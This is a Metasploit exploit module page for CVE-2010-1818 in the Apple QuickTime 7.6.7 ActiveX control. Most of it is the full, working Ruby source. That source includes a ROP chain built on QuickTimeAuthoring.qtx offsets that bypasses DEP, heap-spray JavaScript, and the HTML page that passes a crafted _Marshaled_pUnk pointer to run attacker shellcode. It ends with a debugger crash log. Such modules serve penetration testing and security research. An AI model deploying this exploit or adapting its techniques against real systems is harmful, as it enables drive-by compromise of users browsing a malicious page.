Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution

2010-08-30T20:42:51
ID MSF:EXPLOIT/WINDOWS/BROWSER/APPLE_QUICKTIME_MARSHALED_PUNK
Type metasploit
Reporter Rapid7
Modified 2017-07-24T13:26:21

Description

This module exploits a memory trust issue in Apple QuickTime 7.6.7. When processing a specially-crafted HTML page, the QuickTime ActiveX control will treat a supplied parameter as a trusted pointer. It will then use it as a COM-type pUnknown and lead to arbitrary code execution. This exploit utilizes a combination of heap spraying and the QuickTimeAuthoring.qtx module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such, this module should be reliable on all Windows versions. NOTE: The addresses may need to be adjusted for older versions of QuickTime.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Seh

  #include Msf::Exploit::Remote::BrowserAutopwn
  #autopwn_info({
  #  :os_name => OperatingSystems::Match::WINDOWS,
  #  :ua_name    => HttpClients::IE,
  #  :javascript => true,
  #  :rank       => NormalRanking, # reliable memory corruption
  #})

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution',
      'Description'    => %q{
          This module exploits a memory trust issue in Apple QuickTime
        7.6.7. When processing a specially-crafted HTML page, the QuickTime ActiveX
        control will treat a supplied parameter as a trusted pointer. It will
        then use it as a COM-type pUnknown and lead to arbitrary code execution.

        This exploit utilizes a combination of heap spraying and the
        QuickTimeAuthoring.qtx module to bypass DEP and ASLR. This module does not
        opt-in to ASLR. As such, this module should be reliable on all Windows
        versions.

        NOTE: The addresses may need to be adjusted for older versions of QuickTime.
      },
      'Author'         =>
        [
          'Ruben Santemarta',  # original discovery
          'jduck'              # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2010-1818' ],
          [ 'OSVDB', '67705'],
          [ 'URL', 'http://reversemode.com/index.php?option=com_content&task=view&id=69&Itemid=1' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
        },
      'Payload'        =>
        {
          'Space'    => 384, # perhaps more?
          'BadChars' => "",  # none...
          'DisableNops' => true,
          'PrependEncoder' => Metasm::Shellcode.assemble(Metasm::Ia32.new, "mov esp,ebp").encode_string, # fix esp up
        },
      'Platform' => 'win',
      'Targets'  =>
        [
          # Tested OK:
          #
          # QT 7.6.6 + XP SP3 + IE8
          # QT 7.6.7 + XP SP3 + IE6
          #

          # @eromang reports it doesn't work on 7.6.5
          # - further investigation shows QuickTimeAuthoring.qtx changed / rop gadgets different

          # QuickTimeAuthoring.qtx 7.6.7 is compiled w/DYNAMIC_BASE, so win7 is :(

          [ 'Apple QuickTime Player 7.6.6 and 7.6.7 on Windows XP SP3',
            {
              'Ret' => 0x677a0000, # base of QuickTimeAuthoring.qtx
              #'Ret' => 0x67780000, # base of QuickTimeAuthoring.qtx v7.6.5
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Aug 30 2010',
      'DefaultTarget'  => 0))
  end

  def on_request_uri(client, request)

    return if ((p = regenerate_payload(client)) == nil)

    print_status("Sending exploit HTML...")

    shellcode = Rex::Text.to_unescape(p.encoded)

    # We will spray to this address, hopefully
    spray_target = 0x15220c20

    # This is where our happy little dll is loaded
    # 677a0000 679ce000   QuickTimeAuthoring C:\Program Files\QuickTime\QTSystem\QuickTimeAuthoring.qtx
    rop_mod_base = target.ret

    sploit = [
      spray_target - 8,

      # This first piece of code points the stack pointer to our data!
      # NOTE: eax, ecx, and esi all point to our spray at this point.
      rop_mod_base + 0x79c12, # xchg eax,esp / pop edi / pop esi / ret

      # The second one becomes the new program counter after stack flip.
      rop_mod_base + 0x1e27,       # pop ecx / ret
        rop_mod_base + 0x170088,  # the IAT addr for HeapCreate (becomes ecx)

      # We get the address of HeapCreate from the IAT here.
      rop_mod_base + 0x10244, # mov eax,[ecx] / ret

      # Call HeapCreate to create the k-rad segment
      rop_mod_base + 0x509e, # call eax
        0x01040110, # flOptions (gets & with 0x40005)
        0x01010101, # dwInitialSize
        0x01010101, # dwMaximumSize

      # Don't bother calling HeapAlloc, just add 0x8000 to the Heap Base

      # Set ebx to our adjustment
      rop_mod_base + 0x307a, # pop ebx / ret
        0x8000, # becomes ebx

      # Adjust eax
      rop_mod_base + 0xbfb5b, # add eax,ebx / ret

      # Save our buffer pointer off to this address
      rop_mod_base + 0x1e27,       # pop ecx / ret
        rop_mod_base + 0x2062d4,  # something writable

      # Write eax to the address
      rop_mod_base + 0x8fd6, # mov [ecx], eax / ret

      # Now we must copy our real payload into the buffer

      # First, setup edi
      rop_mod_base + 0x134fd5, # xchg eax,edi / ret

      # Get ESI from EDI (which is now in EAX)
      rop_mod_base + 0x103ff8, # push eax / pop esi / pop ebx / ret
        0x41414141, # scratch (becomes ebx)

      # Set ECX from the stack
      rop_mod_base + 0x1e27,       # pop ecx / ret
        0x200 / 4, # dwords to copy :)

      # copy it!
      rop_mod_base + 0x778d2, # rep movsd / pop edi / pop esi / ret
        0x41414141, # scratch (becomes edi)
        0x41414141, # scratch (becomes esi)

      # Re-load the buffer pointer address
      rop_mod_base + 0x1e27,       # pop ecx / ret
        rop_mod_base + 0x2062d4,  # something writable

      # And the pointer value itself
      rop_mod_base + 0x10244, # mov eax,[ecx] / ret

      # Set ebx to our adjustment
      rop_mod_base + 0x307a, # pop ebx / ret
        0x42424242, # will be filled after array init

      # Adjust eax
      rop_mod_base + 0xbfb5b, # add eax,ebx / ret

      # Jump!
      rop_mod_base + 0x509e,  # call eax

      # eh? Hopefull we didn't reach here.
      0xdeadbeef
    ]
    sploit[27] = 8 + (sploit.length * 4)
    sploit = sploit.pack('V*')
    sploit << p.encoded
    sploit = Rex::Text.to_unescape(sploit)

    custom_js = <<-EOF
function Prepare()
{
  var block = unescape("#{sploit}");
  while(block.length < 0x200)
    block += unescape("%u0000");
  heap = new heapLib.ie(0x20000);
  while(block.length < 0x80000)
    block += block;
  finalspray = block.substring(2, 0x80000 - 0x21);
  for(var i = 0; i < 350; i++)
  {
  heap.alloc(finalspray);
  }
}

function start()
{
  var obj = '<' + 'object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="0" height="0"'+'>'
    + '</'+ 'object>';
  document.getElementById('stb').innerHTML = obj;
  Prepare();
  var targ = #{spray_target};
  var obj = '<' + 'object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="0" height="0"' + '>'
    + '<' + 'PARAM name="_Marshaled_pUnk" value="' + targ + '"' + '/>'
    + '</'+ 'object>';
  document.getElementById('xpl').innerHTML = obj;
}
EOF

    hl_js = heaplib(custom_js)

    content = <<-EOF
<html>
<head>
<script language="javascript">
#{hl_js}
</script>
</head>
<body onload="start()">
<div id="stb"></div>
<div id="xpl"></div>
</body>
</html>
EOF

    # ..
    send_response(client, content, { 'Content-Type' => "text/html" })

    # Handle the payload
    handler(client)
  end
end


=begin
(7fc.a4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=15220c20 ebx=00134ca8 ecx=15220c18 edx=00134b98 esi=15220c20 edi=00134bfc
eip=deadbe01 esp=00134b7c ebp=00134b90 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
deadbe01 ??              ???
=end